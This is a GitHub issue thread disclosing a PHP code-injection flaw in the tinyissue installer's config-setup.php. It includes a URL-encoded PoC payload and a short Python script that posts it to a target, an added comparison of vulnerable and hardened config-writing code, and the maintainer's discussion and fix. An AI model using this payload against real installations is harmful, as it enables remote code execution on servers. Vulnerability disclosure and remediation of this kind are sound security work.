This repository has been archived by the owner on May 9, 2021. It is now read-only.

There is a security problem that can getshell #237

Closed
MrFk opened this issue Feb 20, 2019 · 32 comments
Comments

MrFk commented Feb 20, 2019

The problem file is install/config-setup.php, line 13:

```php
$config_file = str_replace('localhost', $_POST['database_host'], $config_file);
```

It causes a security problem that can getshell.

PoC:

```
POST /install/config-setup.php

data: create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E
```

Finally, in config.app.php, you can see the phpinfo();

[screenshot]

Thank you very much
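The reported pattern beside a hardened version of the same installer step, as an added example that is not code from the original issue or from the tinyissue project. The constants TEMPLATE_PATH and CONFIG_PATH, the function names, and the assumption that the template holds `'localhost'` as a quoted PHP string literal are all assumptions made for this example.

```php
<?php
// Added example (not tinyissue's own code). Shows why splicing a POST value
// into PHP source is a code-injection sink, and one way to harden it.
// TEMPLATE_PATH, CONFIG_PATH and the function names are assumed.

define('TEMPLATE_PATH', __DIR__ . '/config.app.example.php');
define('CONFIG_PATH', __DIR__ . '/config.app.php');

// Pattern as reported in the issue: a single quote in database_host closes the
// string literal in the template, and everything after it is written to
// config.app.php as PHP source and executed on the next include.
function write_config_vulnerable(string $host): void
{
    $config_file = file_get_contents(TEMPLATE_PATH);
    $config_file = str_replace('localhost', $host, $config_file);
    file_put_contents(CONFIG_PATH, $config_file);
}

// Hardened version:
//  1. refuse to run once a config file exists, so the installer is not
//     reusable after setup (the guard the thread's fix relies on);
//  2. accept only hostname / IP / port characters;
//  3. emit the value with var_export(), which always produces a properly
//     quoted and escaped PHP string literal, whatever the input contains.
function write_config_hardened(string $host): void
{
    if (file_exists(CONFIG_PATH)) {
        http_response_code(403);
        exit('Installation already completed.');
    }
    if (!preg_match('/^[A-Za-z0-9.\-:]{1,253}$/', $host)) {
        http_response_code(400);
        exit('Invalid database host.');
    }
    $config_file = file_get_contents(TEMPLATE_PATH);
    // Replace the whole quoted literal, not just the word, so that
    // var_export() is the only thing supplying quotes in the output.
    $config_file = str_replace("'localhost'", var_export($host, true), $config_file);
    file_put_contents(CONFIG_PATH, $config_file, LOCK_EX);
}

if (isset($_POST['create_config'])) {
    write_config_hardened((string)($_POST['database_host'] ?? 'localhost'));
}
```

With the hardened writer, the payload from the PoC fails the allow-list check and never reaches the file; even if the allow-list were loosened, var_export() would write it as an inert string literal rather than as code. The file_exists() guard is what makes "delete the installer" unnecessary, but only if the installer itself enforces it on every request.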

@Patriboom

What is your suggestion ?

MrFk commented Feb 20, 2019

After install.php, delete config-setup.php with the PHP code.

@Patriboom

This already works, and many more features are available on the following fork: https://github.com/pixeline/bugs/issues

MrFk commented Feb 20, 2019

But it didn't delete the file on my computer; is there anything wrong with it?

@Patriboom

No.
The system is supposed to check if the config file exists. If so, the system launches the application.
If no, it launches the installation.
Doesn't matter if the installation file is not deleted. If the system finds the config file, the installation file will never be launched anymore.

MrFk commented Feb 20, 2019

But after finishing the install, config.app.example still exists, and you need to delete config.app.example after the installation with the PHP code.

Patriboom commented Feb 20, 2019

No.
You don't need to delete the file.
It can stay there as « backup » since it will never be read anymore by the system.

MrFk commented Feb 20, 2019

But it can cause a security problem.

MrFk commented Feb 20, 2019

[screenshot]
It shouldn't be deleted by people but by the code.

Patriboom commented Feb 20, 2019

That's solved in more recent forks like the one I mentioned before.
The actual Mikelbring/tinyissue is very old. Last update SIX YEARS ago!!!
I suggest you use a more recent fork.

MrFk commented Feb 20, 2019

No, https://github.com/pixeline/bugs also has this problem; look at this:

[screenshot]

@Patriboom

The same code. I know.
But, it doesn't ask you to delete any file after a complete install process.

MrFk commented Feb 20, 2019

So it is a security problem in the default setting. The install program should delete or rename the install file after the installation.

@Patriboom

Where do you get such screenshots from ?
I would like to repeat the same test as you do.

@Patriboom

Please explain better the issue you've found.
What can create such « miss coding » about you ?

MrFk commented Feb 20, 2019

I built the environment on my computer.
I escaped the Array in config.app.example.php.

PostData is `'),'a'=>var_dump(phpinfo()))?>`

Patriboom commented Feb 20, 2019

For sure, with any open source code, you can change the code and force it to do something which has not been planned by the initial project.
Does the original code expose users to any threat?
If so, which? And how?

Your initial sentence was:

> cause a security problem that can getshell

What is "getshell"?

MrFk commented Feb 20, 2019

"Getshell" means remote command execution; an attacker can execute commands on your service.

@Patriboom

Ok.
Now, how does the code permit that?
Don't say « the hacker can change the code ». If he can, he doesn't need the code to hack the computer; it's already hacked.

MrFk commented Feb 20, 2019

The hacker just needs to repeat my postdata `create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E` like this; the attacker can execute any code he likes.

@Patriboom

If, and only if, the attacker

  1. gets access to the computer
  2. knows the exact name and address of the specific page config-setup.php
    If the hacker has it, he doesn't need config-setup.php as a tool to go further; he is already in the machine and does whatever he wants.
    Where, when and how do you submit such postdata?

Or maybe you put the create_config= in the install page's field.

MrFk commented Feb 20, 2019

Yeah, by the default setting, a hacker can access install/config-setup.php easily.

@Patriboom

I tried your code

```
create_config=123&database_host=%27%29%2C%27a%27%3D%3Evar_dump%28phpinfo%28%29%29%29%3F%3E
```

replacing "localhost" in the install form.

I got an error from the system, not any kind of phpinfo() page.

@Patriboom

Next, I'll try to replace the "create_config" value with your code.

@Patriboom

Doing so: nothing like a phpinfo() again.

@Patriboom

> Yeah, by the default setting, a hacker can access install/config-setup.php easily.

I would like to help people to avoid that. But I'm still unable to redo what you're doing.
Could you explain it to me step by step, please.

MrFk commented Feb 20, 2019

OK, I'll show you the code in a minute.

MrFk commented Feb 20, 2019

```python
import requests

def attack(url):

    datas = {
        'create_config':'123',
        'database_host':"'),'a'=>var_dump(phpinfo()))?>"
    }

    attack_url = '{0}/bugs/install/config-setup.php'.format(url)

    res = requests.post(attack_url,data=datas)

    print res.content


if __name__=='__main__':
    #edit your url here
    attack('http://192.168.2.147')
```

The code uses Python 2.7; you just need to edit the URL.

@Patriboom

Nice.
Big thanks.
The fork will be updated today.

@Patriboom

https://github.com/pixeline/bugs 's install now deletes the config file.

MrFk commented Feb 20, 2019

It's okay.

@Patriboom

For any further suggestion, please comment on https://github.com/pixeline/bugs

@MrFk MrFk closed this as completed Mar 4, 2019